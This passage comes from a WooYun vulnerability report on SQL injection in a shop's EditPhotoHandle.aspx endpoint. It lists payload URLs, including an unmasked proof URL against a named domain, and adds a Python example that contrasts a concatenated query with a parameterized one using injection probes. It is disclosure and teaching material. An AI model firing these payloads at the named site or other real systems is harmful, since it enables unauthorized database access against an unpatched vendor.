115.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
116.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
117.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
118.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
119.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
120.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--_
121.http://**.**.**/EditPhotoHandle.aspxAction=EditCover&PhotoId=1%20and%20@@version>0--


Proof of vulnerability:

http://kbfsshop.com/EditPhotoHandle.aspx?Action=EditCover&PhotoId=1%20and%20@@version>0--


2.jpg

Proof of vulnerability:

As shown above~

Fix recommendation:
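The report leaves this section empty. As an added example, not the vendor's code, here is the defect pattern beside its hardened form in Python, with SQLite standing in for the shop's MSSQL/MySQL back end (the table name ProdCategory and its columns are assumptions). SQLite has no @@version, so the boolean probe `1 and 1=1--` stands in for the report's `@@version>0` probe; the point is the same: the concatenated query executes whatever the client sends in CategoryId, while the hardened handler rejects any non-digit value before a single byte of SQL is built and binds the validated integer as a query parameter.

```python
import re
import sqlite3

# Constructed stand-in for the shop's category table; the table and column
# names are assumptions for this example, not the vendor's real schema.
SAMPLE_CATEGORIES = [
    (1, 0, "Root"),
    (2, 1, "Phones"),
    (3, 1, "Laptops"),
    (4, 2, "Android"),
]

# A request id is accepted only as 1-9 ASCII decimal digits; quotes, spaces,
# comment markers and operators never reach the SQL layer.
PLAIN_ID = re.compile(r"[0-9]{1,9}")


def make_db():
    """In-memory SQLite database seeded with the sample categories."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE ProdCategory (CategoryId INTEGER, ParentId INTEGER, Name TEXT)"
    )
    conn.executemany("INSERT INTO ProdCategory VALUES (?, ?, ?)", SAMPLE_CATEGORIES)
    return conn


def get_child_nodes_unsafe(conn, raw_category_id):
    """The defect pattern behind the report: the query-string value is pasted
    into the SQL text, so whatever the client sends becomes part of the query."""
    sql = (
        "SELECT CategoryId, Name FROM ProdCategory WHERE ParentId = "
        + raw_category_id
        + " ORDER BY CategoryId"
    )
    return conn.execute(sql).fetchall()


def parse_id(raw):
    """Strict allow-list validation for an integer id taken from the request."""
    if raw is None or not PLAIN_ID.fullmatch(raw):
        raise ValueError(f"rejected id value: {raw!r}")
    return int(raw)


def get_child_nodes_safe(conn, raw_category_id):
    """Hardened handler: validate first, then bind the value as a parameter so
    the database driver never interprets it as SQL text."""
    parent = parse_id(raw_category_id)
    return conn.execute(
        "SELECT CategoryId, Name FROM ProdCategory WHERE ParentId = ? ORDER BY CategoryId",
        (parent,),
    ).fetchall()


def outcome(handler, conn, raw):
    """Run a handler and summarise what happened, for side-by-side comparison."""
    try:
        return ("rows", handler(conn, raw))
    except ValueError:
        return ("rejected", None)  # blocked by input validation, no SQL executed
    except sqlite3.OperationalError:
        return ("sql_error", None)  # the database parsed client text as SQL


def compare(raw):
    """Return {'unsafe': ..., 'safe': ...} for one CategoryId value."""
    conn = make_db()
    return {
        "unsafe": outcome(get_child_nodes_unsafe, conn, raw),
        "safe": outcome(get_child_nodes_safe, conn, raw),
    }


if __name__ == "__main__":
    for value in ["1", "2'", "1 and 1=1--"]:
        print(repr(value), compare(value))
```

Running the comparison shows the three behaviours a reviewer should look for: a legitimate `1` returns the same rows from both handlers; the `2'` probe produces a database syntax error from the concatenated query (the error-based signal the report's screenshots rely on) but a validation rejection from the hardened one; and `1 and 1=1--` silently changes the meaning of the concatenated query while the hardened handler refuses it outright. Both measures belong together: parameter binding is what removes the injection, and the digit-only check keeps malformed input from ever reaching the database and gives the detection above something clean to alert on.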

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)